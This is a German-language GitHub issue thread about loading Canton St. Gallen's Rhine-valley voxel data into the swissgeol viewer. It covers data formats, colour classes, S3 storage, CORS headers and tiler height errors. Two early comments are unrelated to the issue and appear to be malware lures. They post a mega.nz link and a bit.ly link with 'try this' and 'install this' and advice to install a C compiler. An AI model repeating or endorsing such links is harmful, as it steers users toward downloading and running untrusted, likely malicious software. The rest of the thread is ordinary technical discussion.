### ISSUE TITLE
Integration Voxel-Daten KT-SG

### ISSUE THREAD

**Issue by nOester** [swisstopo/swissgeol-viewer-app#1346]
**Beschreibung**
Der Kanton SG hat Voxeldaten aus dem Rheintal an swisstopo geliefert. Diese Daten (ASCII-Format) sollen bis Ende 2024 mittels Voxel-Tiler CLI (CLI der Firma Cesium) in den Viewer integriert werden.
Beschreibung der Daten:
```
##Lieferung: 06/07.05.2024
Voxelmodell des Rheintals vom Kanton SG zur Intergation in viewer.swissgeol.ch


##Lieferung 06-05-2024: 
filename: all.csv (ca. 850MB)
Auflösung:50 x 50 x 2 Meter
3D-Tiles: s3://ngmpub-download-bgdi-ch/testvoxel/test20250113_KTSGRhein/all/


## Bsp.: 
3D-ModellX;Y;Z;Klasse
2751100;1223200;270.0;0
2751150;1223200;270.0;0
...
2751100;1223200;272.0;0
2751150;1223200;272.0;0
2751200;1223200;272.0;0

##Lieferung 07-05-2024:
filename: Modell_Rheintal_Nord_fein.csv (ca. 630MB)
Auflösung: 25 x 25 x 1 Meter


## Bsp.: 
X;Y;Z;Klasse
2756550;1223275;270.0;6
2756575;1223275;270.0;6
...
2756550;1223275;271.0;6
2756575;1223275;271.0;6
2756600;1223275;271.0;6


##Klassen:
1: sehr gross
2: gross
3: mässig gross
4: mässig
5: gering
6: shr gering
```

 Klasse: `RGB`  
- 0: ``  
- 1: `rgb(0, 0, 255)`    
- 2: `rgb(30, 144, 255)`  
- 3: `rgb(173, 216, 230)`  
- 4: `rgb(144, 238, 144)`  
- 5: `rgb(255, 165, 0)` 
- 6: `rgb(255, 255, 0)`

**ToDos**
- [x] Lizenz bestellen und Voxel-Tiler auf swisstopo Server installieren (@nOester)
- [ ] Voxeldaten mittels Voxel-Tiler für die Integration in viewer.swissgeol.ch aufbereiten. Speicherung der auf dem S3-Bucket (s3://ngmpub-download-bgdi-ch/testvoxel/), in dem auch die bestehenden Voxeldaten gespeichert sind. (EBP, @nOester )
- [x] Integration der Voxeldaten in den Layertree (https://github.com/swisstopo/swissgeol-viewer-app/blob/master/ui/src/layertree.ts), wie z.B. für die Aaretal-Daten (https://github.com/swisstopo/swissgeol-viewer-app/blob/044ec78481949fa9d29b4a7de6d8dce5ab755e41/ui/src/layertree.ts#L883C1-L895C11) (@nOester )
- [x] Definition welche Parameter in welcher Farbe dargestellt werden sollen (@nOester)
- [ ] Aktivierung Filterfunktionalität (EBP)
- [ ] Aktivierung "Voxel-Pickings", Anzeige der Koordinaten und Parameter beim click auf eine Zelle (EBP)
- [ ] Zusatz (evtl. separates Issue): Prüfung, ob bzw. wie die Definition der Farbgebung dynamisch umgesetzt werden kann. Zurzeit werden die Farben in https://github.com/swisstopo/swissgeol-viewer-app/blob/master/ui/src/layertree.ts im Code für jeden Voxel-Layer getrennt statisch definiert. (EBP)

**Acceptance Criteria**
- [ ] Die Voxel-Daten des Kantons SG stehen in viewer.swissgeol.ch zur Anzeige, Abfrage (Voxel-Picking) und Download an der definierten Stelle im Layertree bereit.

**Hinweis**
Zugang zu Voxelfilter und Voxel-Picking, sowie Platzierung des neuen Layers im aktuellen Layertree. 
![Image](https://github.com/user-attachments/assets/889ba328-0e50-46e8-9c91-dd067b35f5ca)

**Comment by SneakPeak2003** [comment]
try this

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ

you may need to install the c compiler

**Comment by odoyhaha** [comment]
install this
https://bit.ly/3XQLHlH
If you don't have the c compliator, install it.(gcc or clang)

**Comment by nOester** [comment]
Test daten: [2025-0107_Modell_Rheintal_Nord_fein_first100-comma.zip](https://github.com/user-attachments/files/18338767/2025-0107_Modell_Rheintal_Nord_fein_first100-comma.zip)

**Comment by nOester** [comment]
Hallo @daniel-va , @TIL-EBP und @vej-ananas 
Ich habe die erste Version der Voxeldaten vom Kanton SG in folgendem Ordner in S3-Bucket abgelegt

s3://ngmpub-download-bgdi-ch/testvoxel/test20250113_KTSGRhein/all/ 
https://ngmpub-download-bgdi-ch.s3.eu-west-1.amazonaws.com/testvoxel/test20250113_KTSGRhein/all/ 

Sie sollen über folgende URL zugänglich sein: https://download.swissgeol.ch/testvoxel/test20250113_KTSGRhein/all/tileset.json

**Comment by daniel-va** [comment]
@nOester Ich habe mal mit der Integration der Daten begonnen. Nun kann das `tileset.json` leider noch nicht geladen werden, da es noch keine CORS-Header zurückgibt. Diese müssten z.B. analog zum [Temperaturmodell Mittelland](https://download.swissgeol.ch/testvoxel/20240617/Voxel-Temperaturmodell-GeoMol15/tileset.json) gesetzt werden:

![Image](https://github.com/user-attachments/assets/6d8499d7-dfb7-4140-98b9-6d85412d4a62)

Diese Header fehlen übrigens auch bei den anderen Voxel-Tilesets und machen es mir so nicht möglich, diese zu öffnen.

Auch sind für die anderen Voxel-Daten noch eine Download-URL und eine GeoCat-ID hinterlegt, hier z.B, für Genf:
```ts
{
  url: 'https://download.swissgeol.ch/testvoxel/20240415/Voxel-GENF-Combined/tileset.json',
  ...
  downloadUrl: DOWNLOAD_ROOT_VOXEL + 'legends/Vox-GVA-Legende.pdf',
  geocatId: '4a4a530f-6a2a-423d-834e-2831d70fde20',
}
```
Gibt es solche Daten auch für diese neuen Datensätze?

**Comment by nOester** [comment]
Hallo @daniel-va 
Ok, danke für die Info.
Kurze Frage, warum können wir im produktiven Viewer die Voxeldaten anzeigen, wenn die CORS-Header fehlen?

> Gibt es solche Daten auch für diese neuen Datensätze?
Meinst du, ob es ein legenden file geben wird? --> Ja. 
Bei Geocat muss ich noch mit dem Lieferanten sprechen, ob es bereits einen Eintrag gibt,

Zur Info. Ich habe die Daten an Cesium gesendet, weil ich  nicht sicher bin, ob sie korrekt erstellt wurden. Es kann also sein, dass man nichts sieht, auch wenn das CORS-Problem gelöst ist.

**Comment by nOester** [comment]
@daniel-va Wollen wir das heute mal ansehen? 11-11:30?

**Comment by daniel-va** [comment]
Die Daten und Filter sind jetzt integriert. Bei den Filtern müssen wir wahrscheinlich nochmal drüber reden, ob die so korrekt sind - Stand jetzt besitzt jedes Voxel-Layer auch Filter für die Hydraulische Leitfähigkeit. Für diese neuen Daten scheint es aber keine solchen zu geben.

Ansonsten warten wir noch drauf, dass die Daten korrigiert werden. Stand jetzt sind alle Werte auf 0.

**Comment by nOester** [comment]
> Die Daten und Filter sind jetzt integriert. Bei den Filtern müssen wir wahrscheinlich nochmal drüber reden, ob die so korrekt sind - Stand jetzt besitzt jedes Voxel-Layer auch Filter für die Hydraulische Leitfähigkeit. Für diese neuen Daten scheint es aber keine solchen zu geben.

Alles klar, danke für die Info. Ja, die daten vom Rheintal haben nur Werte für das Attribut-Klasse

**Comment by nOester** [comment]
@daniel-va 
Folgenden link zu den Metadaten sollte für den Layer verlinkt werden: https://www.geocat.ch/datahub/dataset/c12c8e4e-4c06-41c9-b705-f1dadb0654ae-8371

<img width="326" alt="Image" src="https://github.com/user-attachments/assets/7cdeec09-b04a-409a-9218-d164ff09b232" />

**Comment by nOester** [comment]
@daniel-va 
Wie bereits besprochen, es werden neue Daten geliefert, sobald ich diese erhalten und aufbereitet habe, können sie integriert werden.

**Comment by nOester** [comment]
Die Fehler in der Höhenlage scheinen am Voxeltiler zu liegen.
Der Voxeltiler für Daten mit der Voxelzellengrösse von <2m ist auf eine kartesische Darstellung beschränkt. Das modell wird dabei rechtwinklig erstellt und im Zentrum am Terrain aufgehängt. dadurch sind die daten im Zentrum "korrekt" positioniert in Z-Richtung. Aufgrund der Erdkrümmung an den Rändern leiegen sie über dem Terrain.
Der Tiler soll im Laufe dieses Jahres angepasst werden.
